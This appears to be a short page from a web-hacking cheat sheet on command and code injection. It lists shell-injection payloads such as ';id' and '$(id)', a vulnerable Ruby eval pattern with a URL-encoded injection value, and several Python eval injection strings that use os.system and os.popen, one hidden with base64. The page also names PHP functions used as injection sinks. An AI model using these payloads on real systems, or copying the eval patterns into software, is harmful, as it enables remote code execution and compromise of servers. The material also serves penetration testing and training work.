Execute Commands

Command Execution

;id
`id`
$(id)

Ruby Code Execution

eval "\""+params['1']+"\""

?1="%2b`id`%2b"

Python Code Execution

eval('"'+1+'"')

"%2bos.system('id')%2b"

"%2bos.popen('id').read()%2b"

"%2b__import__('os').popen('id').read()%2b"

"%2b__import__('os').popen(__import__('base64').b64decode('aWQ=')).read()%2b"

Perl Code Execution

PHP Code Execution

usort()

preg_replace()

assert()

Last updated

Was this helpful?